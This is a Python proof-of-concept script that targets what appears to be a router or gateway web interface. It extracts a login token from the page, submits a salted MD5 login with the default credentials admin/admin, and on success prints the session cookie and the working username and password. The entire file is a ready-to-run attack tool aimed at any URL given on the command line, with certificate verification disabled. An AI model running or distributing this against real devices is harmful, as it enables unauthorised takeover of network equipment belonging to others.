# -*- encoding: utf-8 -*- import base64 import hashlib import random import re import traceback from warnings import filterwarnings import requests filterwarnings("ignore") class POC: def __init__(self, url): self.url = url if str.endswith(url,"/") else f"{url}/" self.s = requests.Session() self.s.headers.update({ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36", "Referer": url, "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8" }) def get_token(self): r = self.s.get(self.url, verify=False, allow_redirects=True, timeout=10) token_match = re.search(r'getObj\s*\(\s*"Frm_Logintoken"\s*\)\s*\.value\s*=\s*["\'](\d+)["\']', r.text, re.IGNORECASE) if token_match: return token_match.group(1) fallback = re.search(r'name="Frm_Logintoken"\s*[^>]*value="(\d+)"', r.text) return fallback.group(1) if fallback else "13" def verify(self): try: token = self.get_token() rand_num = str(random.randint(10000000, 99999999)) pwd = "admin" final_pwd = hashlib.md5((pwd + rand_num).encode()).hexdigest() data = { "frashnum": "", "action": "login", "Frm_Logintoken": token, "UserRandomNum": rand_num, "Username": "admin", "Password": final_pwd, "LoginId": "Login" } resp = self.s.post(self.url, data=data, allow_redirects=False, verify=False, timeout=10) if resp.status_code == 302 and resp.headers.get("Location", "").endswith("start.ghtml"): print(f"SID Cookie: {self.s.cookies.get('SID', '无')}") print("YES!! \n User:admin\n Pwd:admin\n") except Exception as e: traceback.print_exc() print(e) if __name__ == "__main__": import sys arg = sys.argv POC(arg[1]).verify()